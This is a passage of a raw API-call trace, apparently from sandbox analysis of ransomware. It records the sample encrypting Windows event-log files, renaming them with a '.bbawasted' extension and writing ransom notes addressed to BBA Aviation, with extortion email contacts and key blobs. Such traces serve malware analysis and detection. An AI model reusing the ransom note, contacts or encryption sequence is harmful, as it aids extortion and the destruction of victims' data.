dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0188.517] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0188.517] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0188.517] CloseHandle (hObject=0x294) returned 1 [0188.538] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0188.539] CloseHandle (hObject=0x280) returned 1 [0188.539] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0188.548] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6790) returned 1 [0188.549] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0188.549] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0188.549] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a63d8) returned 1 [0188.550] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0188.550] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0188.731] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0188.732] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0188.732] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0188.732] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]SGhaV1cHViaNFHGkzaR1Z6NhC/MpkyO2Ug5Dy5TG29OaDtEVK7JHErCfS6cEuoYJ\r\nmoIWwYNylergP6d4MzW8u/0mJ5eVgGT4+XJYMlBUAHXiogcVtqLL7S9qxNa404JZ\r\nqEY+KIwu172C47yZ9y8C7xnOQ3EGLBMWNNRf7jk4bg5ZMeXV0KjyaDBu7JYJuaiC\r\n8iQ6ASRYq4ahdcTTSByni4ERLXcm+SIYE7GAvZRjDIhSrelUsVKVlNQp4YiG7azN\r\nzVWebu7JoF2AFgbZhZA/isDxhMWpPo3LnBO6i1erBCYZnd63MYf33bhQsL7Wc9aA\r\na7OXJFCCV+xQxAP9YRikLPV9r4Iotpl5R+mEfmpM3VGDlVshcF/wrt3Fud6LIgf/\r\nKoLOWMNFA/EDQNtJY0MCd/n5+T4amvKkwO2hX9HTTgrWTmqYpjdGYdc1zHOpja8j\r\nOCmGnDeHzh7/TASG0estopvxV/XQbmBVr5Bt6xFvd5T/jB8Srpe/4sX21Ev3PTDP\r\njweGJdpqlF5Z7A/BHMqkS18S9v7gDBUNwi6bxHK2NJdWgopk2SWDm9ZX4cqTaN9b\r\nuDSapGtQL6ClSK60P7nu911uZGuMcMkc8u0rPygMs4KS2yFQ643owXxQEeE56dpM\r\nyZp+ELCfggKrqWZe2J1Zg0RpcemYG4B9iCPw15inXZW=[end_key]\r\nKEEP IT\r\n") returned 984 [0188.732] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0188.732] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0188.732] SetEndOfFile (hFile=0x28c) returned 1 [0188.735] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0188.735] CloseHandle (hObject=0x28c) returned 1 [0188.741] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0188.741] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a9350 | out: hHeap=0x660000) returned 1 [0188.741] _aulldvrm () returned 0x0 [0188.741] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6a38) returned 1 [0188.742] CryptGenRandom (in: hProv=0x6a6a38, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0188.742] CryptReleaseContext (hProv=0x6a6a38, dwFlags=0x0) returned 1 [0188.742] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 61 [0188.742] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x284) returned 0x6aecf0 [0188.742] lstrcpyW (in: lpString1=0x6aed6a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0188.743] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0188.743] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6928) returned 1 [0188.743] CryptGenRandom (in: hProv=0x6a6928, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0188.743] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0188.745] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0188.747] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0188.749] SetEndOfFile (hFile=0x28c) returned 1 [0188.750] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.750] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0188.750] lstrcpyW (in: lpString1=0x6aed6a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0188.750] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx.bbawasted")) returned 1 [0188.755] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0188.755] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0188.755] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0188.756] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0188.756] CloseHandle (hObject=0x280) returned 1 [0189.026] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0189.027] CloseHandle (hObject=0x294) returned 1 [0189.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0189.027] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a64e8) returned 1 [0189.028] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0189.028] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0189.028] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6130) returned 1 [0189.029] CryptGenRandom (in: hProv=0x6a6130, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0189.029] CryptReleaseContext (hProv=0x6a6130, dwFlags=0x0) returned 1 [0189.040] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6a8fa8 [0189.041] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0189.041] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0189.041] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]ZtZpn2i8FX3LTqWNdG+qpEfB84V2rIt5uzhE98J/jLG5/bGwJJt/b+cJGBJWVZ6y\r\nVz7JLMw4J71aKZkt22On1aPqT/tpRTi444OQnslcM0tkqF0crGkXYbKyScgN1Oku\r\n5k65Sv7X/bcrlN+iyv5Z535rF8wTdvJOwVXdPI7l63qTEjQsorWdZH5Qz2RjZt8l\r\n3MvzoMqIr6K811eJ8hFYf4KTWIZ9TQJDC8UMxrZ7NKehvaTpLvTxyyvOmNde41je\r\n3ky8axtpMzs2IViox07W+bImUVZey7P6e+JtHOZXN1HLc0krNudS+RSWaeku2u+N\r\nRW1PqCKFt8j/uDYhjN+mZecH3XZZzYikydJ/nQqGsdts0TcaubOBVjCN2U3KYIAe\r\nCDoZHyKLOTPfkLICbVc10gRO0oXep910v5EqWikN5fCIAButXv8Po1aA/flUqAFX\r\n7JV5QO9NNU8BEK98VO7tGmbeseRCA4jpyCYEoj26OJqmLP6HTY8PDUdTKXegWLsv\r\nEZDfLMI83I99xkK5cKM78xZDHES/v/lQCgkP6CDW1gQwGBdAbpvVsc0Y/66cqTVy\r\nNu5/j0a37ulvg2lvHP2bX++VdHz4kb3j0dNwwsEVcMHwnuLEdRG6gYCOwTdeeBHq\r\nLBnD2VoT/TJ8EpN1EvITl7w43kMYkaEj+ehquT/lHrj=[end_key]\r\nKEEP IT\r\n") returned 984 [0189.041] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0189.041] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0189.041] SetEndOfFile (hFile=0x28c) returned 1 [0189.045] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0189.045] CloseHandle (hObject=0x28c) returned 1 [0189.048] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0189.048] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8188 | out: hHeap=0x660000) returned 1 [0189.048] _aulldvrm () returned 0x0 [0189.048] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6790) returned 1 [0189.049] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0189.049] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0189.049] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 71 [0189.049] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x298) returned 0x6aecf0 [0189.050] lstrcpyW (in: lpString1=0x6aed7e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0189.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0189.050] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a5f10) returned 1 [0189.050] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0189.050] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0189.050] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0189.051] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0189.053] SetEndOfFile (hFile=0x28c) returned 1 [0189.053] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0189.053] lstrcpyW (in: lpString1=0x6aed7e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0189.053] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx.bbawasted")) returned 1 [0189.054] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0189.054] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0189.055] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0189.055] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0189.055] CloseHandle (hObject=0x294) returned 1 [0189.194] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0189.194] CloseHandle (hObject=0x280) returned 1 [0189.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0189.194] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a60a8) returned 1 [0189.195] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0189.195] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0189.195] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6350) returned 1 [0189.196] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0189.196] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0189.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6a8fa8 [0189.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0189.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0189.207] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]dfUa7T4prsWKDlf2QLo6E7TFBN7BPG7dMMV5eGKrxcJ2TL2ZGENNjkUxFprCJ2U9\r\nMcoeOrRL3Kd6Er4HCjtn4wxgP1xyLP6vrZ9M6vRnCz0+inmSUTjovrW/kxCCsTq/\r\nXDd7bGbXCEa5GY1zIXi1lakzDv+VeuGSxjnmlx1/gwGO6nYXS/iU4lou4ans4KM4\r\nqHsQwNllg9+90s0JBCJaY1ivYQuFRyqJ0VPlsxqbqyT1a9x5HX65tv1lMqHcz0TC\r\nZnQQIOvbBEHNLrRUti6dL3Z81H6Pjsmara9cOi51N/eVbw6FVjVwUc1aSnOK2fhf\r\nJ6sUnQupzvGoeDy1cktfojD7U/ehs+F4bWUIjbQlDx1pFqnW6HHJdfZnhUCh6+H1\r\nwXwTfXpK5/F8DxAiMlSYuO7z5q5T4r2JZ70wivtOCBcdg0cDJnGzkBPZepIHVCob\r\nXGvfj9k3K9+fRuuGkTMZ66QRNWvGsNdHDgU9kH19cSMw6s5XHI+z5hilLyyXxoFs\r\n5cWXzZcLqKG6il1GzdJGoy4REyZrGau+dEM/3D+qC2SFUPErhHjjm5hauIqPA6f5\r\nj/PsHuTBB1tGA+oyHlEv93KJJN8DJk+CHzMeF01aaGRzDOruUbjjqJO+g5IBfVL3\r\n/dzFRr8WSEZ4jVYlEowCewtHUGis6BiyC7F+2c2KFJq=[end_key]\r\nKEEP IT\r\n") returned 984 [0189.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0189.207] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0189.208] SetEndOfFile (hFile=0x28c) returned 1 [0189.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0189.211] CloseHandle (hObject=0x28c) returned 1 [0189.216] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0189.216] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a9418 | out: hHeap=0x660000) returned 1 [0189.216] _aulldvrm () returned 0x0 [0189.216] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a62c8) returned 1 [0189.217] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0189.217] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0189.217] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 59 [0189.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x280) returned 0x6aecf0 [0189.217] lstrcpyW (in: lpString1=0x6aed66, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0189.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0189.218] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a62c8) returned 1 [0189.218] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0189.218] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0189.218] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0189.220] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0189.221] SetEndOfFile (hFile=0x28c) returned 1 [0189.221] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0189.221] lstrcpyW (in: lpString1=0x6aed66, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0189.221] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx.bbawasted")) returned 1 [0189.222] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0189.222] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0189.222] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0189.222] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0189.222] CloseHandle (hObject=0x280) returned 1 [0189.382] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0189.382] CloseHandle (hObject=0x294) returned 1 [0189.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0189.382] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a65f8) returned 1 [0189.383] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0189.383] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0189.383] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6ac0) returned 1 [0189.384] CryptGenRandom (in: hProv=0x6a6ac0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0189.384] CryptReleaseContext (hProv=0x6a6ac0, dwFlags=0x0) returned 1 [0189.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0189.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0189.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0189.400] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 